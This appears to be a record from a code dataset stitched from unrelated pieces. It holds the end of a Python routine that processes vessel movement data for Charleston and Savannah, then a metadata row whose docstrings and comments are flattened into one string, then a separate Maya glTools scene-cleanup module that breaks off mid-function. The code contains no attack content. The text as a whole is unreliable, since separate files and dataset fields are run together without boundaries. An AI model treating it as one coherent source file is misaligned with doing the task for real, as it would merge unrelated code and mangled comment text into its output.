    # split data into Charleston and Savannah DataFrames based on latitude
    # NOTE(review): 32.033 appears to be the CH/SV dividing latitude - confirm
    for i in range(len(ports)):
        ch_df = (df.loc[:, "Latitude"] >= 32.033)
        sv_df = (df.loc[:, "Latitude"] < 32.033)
        ports[i] = df[ch_df] if (i == 0) else df[sv_df]
        # if there is no vessel data on a given day (e.g. major holidays)
        # return empty DataFrames
        if not len(ports[i]):
            empty = pd.DataFrame({"Date/Time UTC":[], "Name":[], "MMSI":[],
                                  "Max Speed kn":[], "Mean Speed kn":[],
                                  "LOA ft":[], "Beam ft":[], "Class":[],
                                  "AIS Type":[], "Course":[], "Heading":[],
                                  "Course Behavior":[], "Yaw deg":[],
                                  "Effective Beam ft":[], "WDIR degT":[],
                                  "WSPD mph":[], "GST mph":[], "Buoy Source":[],
                                  "Location":[], "Latitude":[], "Longitude":[],
                                  "Transit":[], "% Channel Occupied":[]})
            ports[i] = [empty, empty]
            continue
        # positions east of the channel midpoint are considered offshore
        ports[i].loc[:, "Location"] = "Nearshore"
        off_row = (ports[i].loc[:, "Longitude"] > channel_midpoint[i])
        off_loc = ports[i].loc[off_row, :].index
        offshore_indices = ports[i].index.isin(off_loc)
        ports[i].loc[offshore_indices, "Location"] = "Offshore"
        # add_wind/meetpass/twoway/_wrangle_vmr etc. are defined elsewhere
        # in this module
        ports[i] = add_wind(ports, i, buoys, alt_buoys)
        ports[i] = _course_behavior(ports[i], course_ranges[i])
        ports[i] = _add_vessel_class(ports[i])
        # create yaw column based on difference between course and heading
        ports[i].loc[:, "Yaw deg"] = abs(ports[i].loc[:, "Course"] -
                                         ports[i].loc[:, "Heading"])
        # compute effective beam based on vessel beam, loa, and yaw
        eff_beam = []
        loa = ports[i].loc[:, "LOA ft"].values
        beam = ports[i].loc[:, "Beam ft"].values
        yaw = ports[i].loc[:, "Yaw deg"].values
        for l in range(ports[i].shape[0]):
            # effective beam formula derived using trigonometry and geometry
            # of vessel positions
            eff_beam.append(round((math.cos(math.radians(90 - yaw[l])) *
                                   loa[l]) + (math.cos(math.radians(yaw[l])) *
                                   beam[l])))
        ports[i].loc[:, "Effective Beam ft"] = eff_beam
        ports[i].loc[:, "Effective Beam ft"] = ports[i].loc[:,
                                               "Effective Beam ft"].round(0)
        # remove unwanted blacklist vessels
        ports[i] = _filter_blacklisters(ports[i], blacklist)
        # create rounded DateTime column for meetpass analysis
        stamps = len(ports[i].loc[:, "Date/Time UTC"]) # number of timestamps
        round_times = [ports[i].loc[:, "Date/Time UTC"].iloc[ii].floor("Min")
                       for ii in range(stamps)]
        ports[i].loc[:, "rounded date"] = round_times
        # run meetpass analysis and create Transit column based on results
        mp = meetpass(ports[i])
        two_way = twoway(ports[i], mp)
        ports[i].loc[:, "Transit"] = "One-way Transit"
        if not isinstance(two_way, type(None)):
            two_way_indices = ports[i].index.isin(two_way.index)
            ports[i].loc[two_way_indices, "Transit"] = "Two-way Transit"
        # reset index to clear previous pandas manipulations
        ports[i] = ports[i].reset_index()
        ports[i] = _add_channel_occ(ports, i)
        # save current format of data as all_res to be used for all positions
        all_res = ports[i]
        # remove sections of channel where ships turn
        # NOTE(review): latitude bounds below look channel-specific - confirm
        if i % 2:
            all_res = all_res[(all_res.loc[:, "Latitude"] <= 32.02838) &
                              (all_res.loc[:, "Latitude"] >= 31.9985) |
                              (all_res.loc[:, "Latitude"] <= 31.99183)]
        else:
            all_res = all_res[all_res.loc[:, "Latitude"] >= 32.667473]
        fold_res = _fold_vmr(ports, i)
        # return max and mean positional data in specified order
        fold_res = fold_res.loc[:, ("Date/Time UTC", "Name", "MMSI",
                                    "Max Speed kn", "Mean Speed kn", "LOA ft",
                                    "Beam ft", "Class", "AIS Type", "Course",
                                    "Heading", "Course Behavior", "Yaw deg",
                                    "Effective Beam ft", "WDIR degT",
                                    "WSPD mph", "GST mph", "Buoy Source",
                                    "Location", "Latitude", "Longitude",
                                    "Transit", "% Channel Occupied")]
        # return positional data in specified order
        all_res = all_res.loc[:, ("Name", "MMSI", "VSPD kn", "WSPD mph",
                                  "Transit", "% Channel Occupied", "Yaw deg",
                                  "Effective Beam ft", "LOA ft", "Beam ft",
                                  "Class", "AIS Type", "Course", "Heading",
                                  "Course Behavior", "WDIR degT", "GST mph",
                                  "Buoy Source", "Location", "Latitude",
                                  "Longitude", "Date/Time UTC")]
        # save two copies of daily vmr for each port, one for all vessel
        # positions and one for maximum vessel speed positions
        ports[i] = [fold_res, all_res]
    return ports[0], ports[1] # ch, sv
| src/process_maritime_data.py | 15,359 | Creates the channel occupancy column.
Creates 'Class' column based on vessel LOA ft.
Creates 'Course Behavior' column based on channel specific course ranges.
Checks vessel AIS types and omits blacklisted vessel types from the
filtered data. Appends omitted vessels' MMSI's to blacklist.txt.
Args:
df: Vessel movement DataFrame.
Returns:
Filtered vessel movement DataFrame.
Reduces movement report to a DataFrame with a single entry for each
vessel at the point of its maximum speed in the channel. Includes a column
with the vessel's mean speed.
Filters entries with '511' error, impossibly high speed, abnormally
high vessel width, as well as singletons (only one entry) from vessel
movement DataFrame.
Args:
df: Vessel movement DataFrame.
Returns:
Sanitized vessel movement report DataFrame.
Rounds, renames, and sanitizes vessel movement DataFrame. Creates new
columns.
Args:
df: Vessel movement DataFrame.
Returns:
Cleaned vessel movement report DataFrame.
Processes data from vessel movement report. Adds data from wind buoys,
performs meeting and passing analysis. Creates other relevant columns.
Args:
path: Relative path to raw vessel movement report (CSV).
Returns:
Two pairs of two DataFrames corresponding to the movement report.
The first pair of DataFrames contains all vessel movements belonging to
Charleston and Savannah, respectively. The second pair of DataFrames
stores the vessel movement entries at which each vessel achieved
its maximum speed. Again, the first DataFrame in the pair belongs to
Charleston and the second DataFrame belongs to Savannah.
Copyright 2020 The Maritime Whale Authors. All rights reserved. Use of this source code is governed by an MIT-style license that can be found in the LICENSE.txt file. Processes wind and vessel data. Performs simple analysis. TODO: need to generalize this to apply to any port desired; will need to do the same for main, run, plot, etc vessel (AIS) types that should be automatically purged from analysis see details at https://api.vesselfinder.com/docs/ref-aistypes.html threshold in feet meters to feet (conversion) filter out sub-panamax class vessels grab remaining data based on max speed position total channel width for CH and SV are 1000 and 600 ft respectively, but vary based on Class and transit condition create % channel occupancy column for each vessel position based on effective beam, transit, and corresponding channel width filter on course ranges to isolate inbound and outbound ships only replace course values with general inbound and outbound behavior (outbound, inbound) (outbound, inbound) longitudinal channel midpoint for Charleston and Savannah respectively ch, sv Charleston NOAA wind buoy ID (41004) Savannah NOAA wind buoy ID (41008) main wind buoys alternate wind buoys split data into Charleston and Savannah DataFrames based on latitude if there is no vessel data on a given day (e.g. 
major holidays) return empty DataFrames create yaw column based on difference between course and heading compute effective beam based on vessel beam, loa, and yaw effective beam formula derived using trigonometry and geometry of vessel positions remove unwanted blacklist vessels create rounded DateTime column for meetpass analysis number of timestamps run meetpass analysis and create Transit column based on results reset index to clear previous pandas manipulations save current format of data as all_res to be used for all positions remove sections of channel where ships turn return max and mean positional data in specified order return positional data in specified order save two copies of daily vmr for each port, one for all vessel positions and one for maximum vessel speed positions ch, sv | 3,761 | en | 0.846651 |
import maya.mel as mm
import maya.cmds as mc
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.layer
import glTools.utils.reference
import glTools.utils.shader
import glTools.utils.shape
import glTools.utils.transform
import re
# ===========
# - Cleanup -
# ===========
def toggleCons(state):
	'''
	Toggle the display state of all joint buffers ('Con') in the scene
	@param state: The display state to set the joint buffers to
	@type state: bool
	'''
	# Collect all buffer ('Con') joints in the scene
	conJoints = mc.ls('*Con*_jnt',type='joint')
	for jnt in conJoints:
		# Show as bone, or hide via display override LOD
		if state:
			glTools.utils.base.displayOverride(jnt,overrideEnable=1,overrideLOD=0)
			mc.setAttr(jnt+'.drawStyle',0) # Bone
		else:
			glTools.utils.base.displayOverride(jnt,overrideEnable=1,overrideLOD=1)
			mc.setAttr(jnt+'.drawStyle',2) # None
		# Zero the joint radius and remove it from the channel box
		if mc.getAttr(jnt+'.radius',se=True):
			mc.setAttr(jnt+'.radius',0.0)
			mc.setAttr(jnt+'.radius',cb=False)
		# Remove rotate order from the channel box
		if mc.getAttr(jnt+'.ro',se=True):
			mc.setAttr(jnt+'.ro',cb=False)
	# Return the list of joints processed
	return conJoints
def toggleEnds(state):
	'''
	Toggle the display state of all end joints ('End') in the scene
	@param state: The display state to set the end joints to
	@type state: bool
	'''
	# Collect all end joints in the scene
	endJoints = mc.ls('*End_jnt',type='joint')
	for jnt in endJoints:
		# Show as bone, or hide via display override LOD
		if state:
			glTools.utils.base.displayOverride(jnt,overrideEnable=1,overrideLOD=0)
			mc.setAttr(jnt+'.drawStyle',0) # Bone
		else:
			glTools.utils.base.displayOverride(jnt,overrideEnable=1,overrideLOD=1)
			mc.setAttr(jnt+'.drawStyle',2) # None
		# Zero the joint radius and remove it from the channel box
		if mc.getAttr(jnt+'.radius',se=True):
			mc.setAttr(jnt+'.radius',0.0)
			mc.setAttr(jnt+'.radius',cb=False)
		# Remove rotate order from the channel box
		if mc.getAttr(jnt+'.ro',se=True):
			mc.setAttr(jnt+'.ro',cb=False)
	# Return the list of joints processed
	return endJoints
def disableDrawingOverrides(grp):
	'''
	Disable drawing overrides for all DAG descendents of the specified transform node.
	@param grp: The transform under which all descendent node drawing overrides will be disabled.
	@type grp: str
	'''
	# Validate the input transform
	if not mc.objExists(grp):
		raise Exception('Transform "'+grp+'" does not exists!')
	if not glTools.utils.transform.isTransform(grp):
		raise Exception('Object "'+grp+'" is not a valid transform!')
	# Gather all DAG descendents of the transform
	descendents = mc.ls(mc.listRelatives(grp,ad=True, pa=True) or [],dag=True) or []
	if not descendents: return []
	# Disable the override on each descendent
	overrideName = 'overrideEnabled'
	for node in descendents:
		overrideAttr = node+'.'+overrideName
		# Skip nodes without the override attribute
		if not mc.attributeQuery(overrideName,n=node,ex=True):
			print('Override attribute "'+overrideAttr+'" does not exist! Skipping...')
			continue
		# Break any incoming connection before setting the attribute
		incoming = mc.listConnections(overrideAttr,s=True,d=False) or []
		if incoming:
			print('Found incoming connection for override attribute "'+overrideAttr+'"! ('+incoming[0]+')')
			print('Disconnecting attribute and disabling drawing overrides...')
			mc.disconnectAttr(incoming[0],overrideAttr)
		# Best effort - the attribute may still be locked
		try: mc.setAttr(overrideAttr,0)
		except: pass
	# Return the list of processed nodes
	return descendents
# ==========
# - Checks -
# ==========
def uniqueNameCheck(objList=[],transformsOnly=False):
	'''
	Return a list of nodes with non unique names
	@param objList: List of scene objects to check. If empty, use all existing scene nodes.
	@type objList: list
	@param transformsOnly: Check transform names only
	@type transformsOnly: bool
	'''
	# Default to every node in the scene
	if not objList:
		objList = mc.ls()
	# Restrict to transforms only, or all DAG nodes
	if transformsOnly:
		nodeList = mc.ls(objList,transforms=True)
	else:
		nodeList = mc.ls(objList,dag=True)
	# Non-unique names are reported by Maya as paths containing '|'
	return [node for node in nodeList if '|' in node]
def validNameCheck(objList=[]):
	'''
	Check for valid names in the specified list of nodes
	@param objList: List of objects to check valid names for. If empty use all scene transforms
	@type objList: list
	'''
	# Check object list - default to all scene nodes
	if not objList: objList = mc.ls()
	if not objList: return []
	# Remove default and filter nodes that always exist in a Maya scene
	defNodes = set(['dof1','time1','lambert1','postProcessList1','sequenceManager1','lightLinker1','renderGlobalsList1','dynController1','lightList1','particleCloud1','shaderGlow1'])
	filterTypes = set(['objectTypeFilter','objectNameFilter','objectScriptFilter'])
	objList = [obj for obj in objList if obj not in defNodes
				and not obj.startswith('default')
				and mc.nodeType(obj) not in filterTypes]
	# Check valid names
	result = []
	for obj in objList:
		# Check "pasted"
		if obj.count('pasted'): result.append(obj)
		# Check "poly"
		if obj.count('poly'): result.append(obj)
		# Check double underscore "__"
		if obj.count('__'): result.append(obj)
		# Check names ending with a digit (0-9)
		# BUGFIX: raw string - '(\d+)$' is an invalid escape sequence in
		# modern Python
		digitSearch = re.search(r'(\d+)$', obj)
		if digitSearch and glTools.utils.transform.isTransform(obj):
			if digitSearch.group(0):
				result.append(obj)
	# Remove Duplicate Entries
	result = list(set(result))
	# Return result
	return result
def shapeNameCheck( objList = [],
					typeList = ['mesh','nurbsCurve','nurbsSurface'],
					skipIntermediates = True,
					skipMultipleShapes = False,
					strict = True ):
	'''
	Return a list of incorrectly named geometry shape nodes.
	@param objList: List of objects to check for valid shape names. If empty, get all nodes of the specified type.
	@type objList: list
	@param typeList: List of shape types to check for valid names.
	@type typeList: list
	@param skipIntermediates: Skip intermediate shapes.
	@type skipIntermediates: bool
	@param skipMultipleShapes: Skip objects with multiple shape nodes.
	@type skipMultipleShapes: bool
	@param strict: Shape name must match parent+"Shape" to pass.
	@type strict: bool
	'''
	# Default to all nodes of the specified types
	if not objList: objList = mc.ls(type=typeList)
	# Build Shape List
	shapeList = []
	for obj in objList:
		# Get Shapes from Transform
		if glTools.utils.transform.isTransform(obj):
			# Check Multiple Shapes
			objShapes = mc.listRelatives(obj,s=True,pa=True)
			if not objShapes: continue
			if (len(objShapes) > 1) and skipMultipleShapes: continue
			# BUGFIX: append the shape nodes themselves - previously the
			# transform was appended once per shape, so transform shapes were
			# never actually name-checked (they always failed the type test)
			tShapeList = mc.listRelatives(obj,s=True,ni=skipIntermediates,pa=True)
			for shape in tShapeList:
				shapeList.append(shape)
		elif glTools.utils.shape.isShape(obj):
			shapeList.append(obj)
		else:
			print('Unable to determine shape from object "'+obj+'"! Skipping...')
	# Check Shape Names
	invalidShapeNameList = []
	for shape in shapeList:
		# Check Type
		if not typeList.count(mc.objectType(shape)): continue
		# Check Intermediate Object
		if skipIntermediates and mc.getAttr(shape+'.intermediateObject'): continue
		# Get transform parent name
		parent = mc.listRelatives(shape,p=True,pa=True)[0]
		# Get Short Names
		shapeSN = mc.ls(shape,sn=True)[0]
		parentSN = mc.ls(parent,sn=True)[0]
		# Check Shape Name
		# BUGFIX: elif chain - a shape failing both the strict and the prefix
		# checks was previously appended twice
		if strict and (shape != parent+'Shape'):
			invalidShapeNameList.append(shape)
		elif not shapeSN.startswith(parentSN):
			invalidShapeNameList.append(shape)
		elif not shapeSN.count('Shape'):
			invalidShapeNameList.append(shape)
	# Return Result
	return invalidShapeNameList
def intermediateShapesCheck(objList=[]):
	'''
	Return a list of intermediate shapes.
	@param objList: List of objects to check for intermediate shapes.
	@type objList: list
	'''
	# Default to all scene transforms
	objList = mc.ls(objList,transforms=True) if objList else mc.ls(transforms=True)
	# Collect shapes flagged as intermediate objects
	result = []
	for obj in objList:
		for shape in (mc.listRelatives(obj,s=True,pa=True) or []):
			if mc.objExists(shape+'.intermediateObject'):
				if mc.getAttr(shape+'.intermediateObject'):
					result.append(shape)
	return result
def multipleShapeCheck(objList=[]):
	'''
	Return a list of transforms with multiple shape nodes
	@param objList: List of objects to check for multiple shapes.
	@type objList: list
	'''
	# Default to all scene transforms
	objList = mc.ls(objList,dag=True) if objList else mc.ls(transforms=True)
	result = []
	for transform in objList:
		# Step up to the transform parent for non-transform nodes
		if not glTools.utils.transform.isTransform(transform):
			transform = mc.listRelatives(transform,p=True)[0]
		# Count geometry shapes under the transform
		shapes = mc.listRelatives(transform,s=True)
		if not shapes: continue
		geoShapes = mc.ls(shapes,type=['mesh','nurbsSurface','nurbsCurve'])
		if len(geoShapes) > 1:
			result.append(transform)
	return result
def constructionHistoryCheck(geoList=[]):
	'''
	Return a list of nodes that contain construction history
	@param geoList: List of objects to check for construction history.
	@type geoList: list
	'''
	# Get Scene Geometry
	if not geoList:
		geoList = mc.ls(geometry=True)
	else:
		geoList = mc.listRelatives(geoList,s=True,pa=True)
	# For each shape
	result = []
	# BUGFIX: listRelatives can return None - guard before iterating
	for geo in geoList or []:
		# Check Construction History
		# BUGFIX: listHistory can return None - normalize to a list
		hist = mc.listHistory(geo) or []
		# Remove Self
		if hist.count(geo): hist.remove(geo)
		# Ignore Node Types
		ignore = mc.ls(hist,type=['groupId','shadingEngine','transform'])
		hist = list(set(hist)-set(ignore))
		# Any remaining history nodes flag the parent transform
		if hist:
			obj = mc.listRelatives(geo,p=True,pa=True)
			result.extend(obj)
	# Remove Duplicate Names
	if result: result = list(set(result))
	# Return Result
	return result
def userAttrCheck(objList=[],includeShapes=False):
	'''
	Return a list of user defined attributes for a specified list of nodes (and shapes).
	@param objList: List of objects to check for user defined attributes.
	@type objList: list
	@param includeShapes: Also check shapes for user defined attributes.
	@type includeShapes: bool
	'''
	result = []
	# Default to all scene nodes
	if not objList: objList = mc.ls()
	for obj in objList:
		# Collect node user attributes as "node.attr"
		for attr in (mc.listAttr(obj,ud=True) or []):
			result.append(obj+'.'+attr)
		# Optionally collect shape user attributes
		if includeShapes:
			for shape in (mc.listRelatives(obj,s=True) or []):
				for attr in (mc.listAttr(shape,ud=True) or []):
					result.append(shape+'.'+attr)
	return result
def emptyGroupCheck(objList=[]):
	'''
	List empty groups.
	@param objList: List of transforms to check.
	@type objList: list
	'''
	# Default to all scene transforms
	if not objList: objList = mc.ls(transforms=True)
	else: objList = mc.ls(objList,transforms=True)
	# A group is empty when it has no descendents at all
	return [grp for grp in objList if not mc.listRelatives(grp,ad=True)]
def emptySetCheck(setList=[]):
	'''
	Return a list of empty sets
	@param setList: List of sets to check.
	@type setList: list
	'''
	# Default to all sets in the scene
	if not setList: setList = mc.ls(sets=True)
	result = []
	for setName in setList:
		# Skip anything that isn't actually a set
		if not mc.ls(setName,sets=True): continue
		# Skip Maya's built-in default/initial sets
		if setName.startswith(('default','initial')): continue
		# A set with no members is empty
		if not mc.sets(setName,q=True):
			result.append(setName)
	return result
def emptyLayerCheck(layerList=[]):
	'''
	Return a list if empty layers
	@param layerList: List of layers to check. If empty, use all existing layers in current scene.
	@type layerList: list
	'''
	# Restrict to display/render/anim layers (all layers by default)
	layerTypes = ['displayLayer','renderLayer','animLayer']
	if not layerList: layerList = mc.ls(type=layerTypes)
	else: layerList = mc.ls(layerList,type=layerTypes)
	result = []
	for layer in layerList:
		# Skip anything that isn't actually a layer
		if not mc.ls(layer,type=layerTypes): continue
		# Skip Maya's built-in default layers
		if layer.startswith('default'): continue
		# A layer with no members is empty
		if not glTools.utils.layer.memberList(layer):
			result.append(layer)
	return result
def animCurveCheck(curveTypeList=['animCurveTL','animCurveTA','animCurveTT','animCurveTU','animCurveUL','animCurveUA','animCurveUT','animCurveUU']):
	'''
	Return a list of all existing animCurves of the specified types.
	@param curveTypeList: List of animCurve types to consider.
	@type curveTypeList: list
	'''
	# Gather curves of each requested type
	animCurves = []
	for curveType in curveTypeList:
		animCurves.extend(mc.ls(type=curveType) or [])
	return animCurves
def unusedShadingNodeCheck():
	'''
	Return a list of unused shading nodes.
	'''
	# Delegate to the shader utility module
	unusedNodes = glTools.utils.shader.listUnusedShadingNodes()
	return unusedNodes
def noGeometryShaderCheck(geoList=[]):
	'''
	Return a list of non intermediate geometry shapes with no shader assignment.
	@param geoList: List of geometry to check for shader assignments.
	@type geoList: list
	'''
	# Expand input to non-intermediate mesh/nurbs shapes
	# (all scene geometry by default)
	geoTypes = ['mesh','nurbsSurface']
	if not geoList:
		geoList = mc.ls(type=geoTypes,ni=True)
	else:
		geoList += mc.ls(mc.listRelatives(geoList,ad=True,pa=True) or [],type=geoTypes,ni=True) or []
		geoList = mc.ls(geoList,type=geoTypes,ni=True)
	# Report shapes with no shading group assigned
	return [geo for geo in geoList if not glTools.utils.shader.getSG(geo)]
def unusedReferenceCheck():
	'''
	Return a list of unused reference nodes.
	'''
	# Initialize Return List
	result = []
	# Get list of existing references
	refList = glTools.utils.reference.listReferences()
	# A reference node with no associated reference file is unused.
	# (getReferenceFile raises when no file is associated.)
	for ref in refList:
		try:
			glTools.utils.reference.getReferenceFile(ref)
		# Narrowed from a bare except - don't swallow KeyboardInterrupt etc.
		except Exception:
			result.append(ref)
	# Return Result
	return result
def unknownNodeCheck():
	'''
	Return a list of unknown nodes.
	'''
	# mc.ls may return None when nothing matches - normalize to a list
	return mc.ls(type='unknown') or []
def checkTransforms(objList=[],tol=0.0000000001):
	'''
	Check for non-zero transforms
	@param objList: List of transforms to check.
	@type objList: list
	@param tol: Value tolerance.
	@type tol: float
	'''
	# Default to all scene transforms
	if not objList: objList = mc.ls(transforms=True)
	if not objList: return []
	# Default cameras are expected to have non-zero transforms
	defaultCams = ('persp','front','side','top')
	# Translate/rotate rest value is 0.0, scale rest value is 1.0
	restValues = [	('tx',0.0),('ty',0.0),('tz',0.0),
					('rx',0.0),('ry',0.0),('rz',0.0),
					('sx',1.0),('sy',1.0),('sz',1.0)]
	transformList = []
	for obj in objList:
		if obj in defaultCams: continue
		# Flag the transform on the first channel outside tolerance
		for attr,rest in restValues:
			if abs(mc.getAttr(obj+'.'+attr) - rest) > tol:
				transformList.append(obj)
				break
	# Return Result
	return transformList
def displayOverridesCheck(objList=[]):
	'''
	Check all/specified objects for display overrides
	@param objList: List of DAG nodes to check. If empty, use all DAG nodes in scene
	@type objList: list
	'''
	# Default to all DAG nodes in the scene
	objList = mc.ls(objList,dag=True) if objList else mc.ls(dag=True)
	# Report nodes with drawing overrides enabled
	return [obj for obj in objList if mc.getAttr(obj+'.overrideEnabled')]
# =========
# - Fixes -
# =========
def shapeNameFix(shape):
	'''
	Fix an incorrectly named geometry shape node by renaming it to parent+"Shape".
	@param shape: The shape node to rename.
	@type shape: str
	'''
	# Determine the expected name from the transform parent
	parent = mc.listRelatives(shape,p=True)[0]
	shapeName = parent+'Shape'
	# Abort rather than create a name clash
	if mc.objExists(shapeName):
		raise Exception('Shape "'+shapeName+'" already exists! Unable to rename shape "'+shape+'"!')
	# Rename and return the new shape name
	return mc.rename(shape,shapeName)
def deleteIntermediateShapes(objList=[]):
	'''
	Delete all intermediate shapes in the scene
	@param objList: List of objects to check for intermediate shapes. If empty, check all transforms.
	@type objList: list
	'''
	# Find and delete intermediate shapes
	intermediateShapeList = intermediateShapesCheck(objList)
	if intermediateShapeList:
		mc.delete(intermediateShapeList)
	# Return the deleted shape list
	return intermediateShapeList
def deleteConstructionHistory(geoList=[]):
	'''
	Delete construction history for specified geometry
	@param geoList: List of objects to delete construction history from. If empty, use all scene geometry.
	@type geoList: list
	'''
	# Default to all scene geometry
	if not geoList: geoList = mc.ls(geometry=True)
	# Delete history on each geometry
	for geo in geoList:
		mc.delete(geo,ch=True)
	# Return the processed geometry list
	return geoList
def deleteUserAttrs(nodeList=[],includeShapes=False):
	'''
	Delete user defined attributes from the specified list of nodes
	@param nodeList: List of nodes to delete user defined attrs from. If empty, assume all nodes.
	@type nodeList: list
	@param includeShapes: Also delete user attributes from shape nodes
	@type includeShapes: bool
	'''
	# Check nodeList
	if not nodeList: nodeList = mc.ls()
	# For each node
	for node in nodeList:
		# Delete user attributes
		glTools.utils.attribute.deleteUserAttrs(node)
		# Include Shapes
		if includeShapes:
			# BUGFIX: listRelatives returns None for nodes without shapes -
			# guard before iterating to avoid a TypeError
			shapes = mc.listRelatives(node,s=True) or []
			for shape in shapes:
				glTools.utils.attribute.deleteUserAttrs(shape)
def deleteEmptyGroups(objList=[]):
	'''
	Delete empty groups
	@param objList: List of transforms to check. If empty, check all scene transforms.
	@type objList: list
	'''
	# Find and delete empty groups
	emptyGrpList = emptyGroupCheck(objList=objList)
	if emptyGrpList:
		mc.delete(emptyGrpList)
	# Return the deleted group list
	return emptyGrpList
def deleteEmptySets(setList=[]):
	'''
	Delete empty sets.
	@param setList: List of sets to check. If empty, check all scene sets.
	@type setList: list
	'''
	# NOTE(review): this definition is shadowed by a later deleteEmptySets()
	# in this module, so it is effectively dead code - confirm and remove one.
	# Get Empty Group List
	emptySetList = emptySetCheck(setList=setList)
	# Delete Empty Groups
	if emptySetList: mc.delete(emptySetList)
	# Return Result
	return emptySetList
def deleteEmptyLayers(layerList=[]):
	'''
	Delete empty display/render/anim layers.
	@param layerList: List of layers to check. If empty, check all scene layers.
	@type layerList: list
	'''
	# Find and delete empty layers
	emptyLayerList = emptyLayerCheck(layerList=layerList)
	if emptyLayerList:
		mc.delete(emptyLayerList)
	# Return the deleted layer list
	return emptyLayerList
def deleteUnknownNodes():
	'''
	Delete all node of type "unknown" in the scene.
	Returns the list of deleted unknown node names.
	'''
	# Get list of unknown nodes
	unknownNodes = unknownNodeCheck() or []
	# Delete unknown nodes
	for node in unknownNodes:
		try:
			# Unknown nodes are often locked (e.g. left by missing plug-ins),
			# so unlock before deleting
			mc.lockNode(node,l=False)
			mc.delete(node)
		except:
			print('Problem deleting unknown node "'+node+'"!')
	# Return Result
	return unknownNodes
def deleteNodesByType(nodeTypeList=[]):
	'''
	Delete nodes of the specified type(s).
	@param nodeTypeList: List of node types to delete.
	@type nodeTypeList: list
	'''
	# Nothing to do without node types
	if not nodeTypeList: return []
	# Find and delete matching nodes
	nodeList = mc.ls(type=nodeTypeList) or []
	if nodeList:
		mc.delete(nodeList)
	# Return the deleted node list
	return nodeList
def deleteUnusedReferenceNodes():
	'''
	Delete all unused reference nodes in the scene.
	'''
	# Delegates to Maya's built-in MEL command for removing unused
	# reference nodes
	mm.eval('RNdeleteUnused')
def deleteEmptySets(setList=[]):
	'''
	Delete empty object sets
	@param setList: A list of sets to check. If empty, check all sets in current scene.
	@type setList: list
	'''
	# Check setList
	if not setList: setList = mc.ls(sets=True)
	# Check empty sets
	# (loop variable renamed - previously shadowed the builtin "set")
	emptySetList = []
	for objSet in setList:
		if not mc.sets(objSet,q=True):
			emptySetList.append(objSet)
	# Delete empty sets - best effort, some sets may be locked or default
	for emptySet in emptySetList:
		try: mc.delete(emptySet)
		except: pass
	# Return result
	return emptySetList
def deleteAllSets(excludeList=[]):
	'''
	Delete all object sets, optionally excluding some.
	@param excludeList: A list of sets to exclude from deletion.
	@type excludeList: list
	'''
	# Build the set list, removing any excluded sets
	setList = mc.ls(sets=True)
	if excludeList:
		setList = list(set(setList)-set(mc.ls(excludeList,sets=True)))
	# Delete sets - best effort, some sets may be locked or default
	for deleteSet in setList:
		try: mc.delete(deleteSet)
		except: pass
	# Return the processed set list
	return setList
def deleteUnusedShadingNodes():
	'''
	Delete all unused shading nodes in the scene.
	'''
	# Delegates to Maya's built-in MEL command (Hypershade
	# "Delete Unused Nodes")
	mm.eval('MLdeleteUnused')
def deleteDisplayLayers():
	'''
	Delete all display layers
	'''
	# Get display layer list
	displayLayers = mc.ls(type='displayLayer') or []
	# BUGFIX: guard the removal - list.remove() raises ValueError when
	# 'defaultLayer' is absent (e.g. renamed/non-standard scenes)
	if 'defaultLayer' in displayLayers:
		displayLayers.remove('defaultLayer')
	# Delete display layers
	if displayLayers: mc.delete(displayLayers)
	# Return result
	return displayLayers
def deleteRenderLayers():
	'''
	Delete all render layers
	'''
	# Get render layer list
	renderLayers = mc.ls(type='renderLayer') or []
	# BUGFIX: guard the removal - list.remove() raises ValueError when
	# 'defaultRenderLayer' is absent (e.g. renamed/non-standard scenes)
	if 'defaultRenderLayer' in renderLayers:
		renderLayers.remove('defaultRenderLayer')
	# Delete render layers
	if renderLayers: mc.delete(renderLayers)
	# Return result
	return renderLayers
def assignInitialShadingGroup(geoList=[]):
	'''
	Assign initialShadingGroup (lambert1) to specified geometry.
	@param geoList: List of geometry to apply default shader to. If empty, use all scene geometry
	@type geoList: list
	'''
	# Default to all scene geometry
	if not geoList: geoList = mc.ls(geometry=True)
	if not geoList: return []
	# Force-assign the default shading group
	mc.sets(geoList,fe='initialShadingGroup')
	# Return the processed geometry list
	return geoList
def zeroTransforms(objList=[]):
	'''
	Reset transform values to the rest pose (translate/rotate 0.0, scale 1.0).
	@param objList: List of transforms to zero out. If empty, use all scene transforms.
	@type objList: list
	'''
	# Check Object List
	if not objList: objList = mc.ls(transforms=True)
	if not objList: return []
	# Reset Transforms (only settable channels)
	for obj in objList:
		# Translate
		if mc.getAttr(obj+'.tx',se=True): mc.setAttr(obj+'.tx',0)
		if mc.getAttr(obj+'.ty',se=True): mc.setAttr(obj+'.ty',0)
		if mc.getAttr(obj+'.tz',se=True): mc.setAttr(obj+'.tz',0)
		# Rotate
		if mc.getAttr(obj+'.rx',se=True): mc.setAttr(obj+'.rx',0)
		if mc.getAttr(obj+'.ry',se=True): mc.setAttr(obj+'.ry',0)
		if mc.getAttr(obj+'.rz',se=True): mc.setAttr(obj+'.rz',0)
		# Scale
		# BUGFIX: scale rest value is 1.0, not 0.0 - zero scale collapses
		# geometry (checkTransforms() also treats 1.0 as the scale rest value)
		if mc.getAttr(obj+'.sx',se=True): mc.setAttr(obj+'.sx',1)
		if mc.getAttr(obj+'.sy',se=True): mc.setAttr(obj+'.sy',1)
		if mc.getAttr(obj+'.sz',se=True): mc.setAttr(obj+'.sz',1)
	# Return Result
	return objList
def copyInputShapeAttrs(geoList=[]):
	'''
	Copy user defined attributes from an input shape to the output deforming shape.
	@param geoList: List of geometry to copy atributes for.
	@type geoList: list
	'''
	# Default to all geometry transforms in the scene
	if not geoList: geoList = mc.listRelatives(mc.ls(geometry=True) or [],p=True,pa=True) or []
	if not geoList: return []
	for geo in geoList:
		# Resolve the (non-intermediate) output shape
		shapes = mc.listRelatives(geo,s=True,ni=True) or []
		if not shapes:
			print('No shape found for geometry transform "'+geo+'"!')
			continue
		outputShape = shapes[0]
		# Resolve the input shape, falling back to the output shape
		inputShape = outputShape
		try: inputShape = glTools.utils.shape.findInputShape(outputShape)
		except: pass
		# Copy user-defined attributes when a distinct input shape exists
		if inputShape != outputShape:
			for at in (mc.listAttr(inputShape,ud=True,s=True) or []):
				glTools.utils.attribute.copyAttr(inputShape,outputShape,at)
# ========
# - MISC -
# ========
def removeTurtle():
	'''
	Delete nodes and unload the plugin related to the Turtle Renderer.
	'''
	# Remove Turtle Nodes
	turtleNode = 'TurtleDefaultBakeLayer'
	if mc.objExists(turtleNode):
		print('Removing Turtle nodes...')
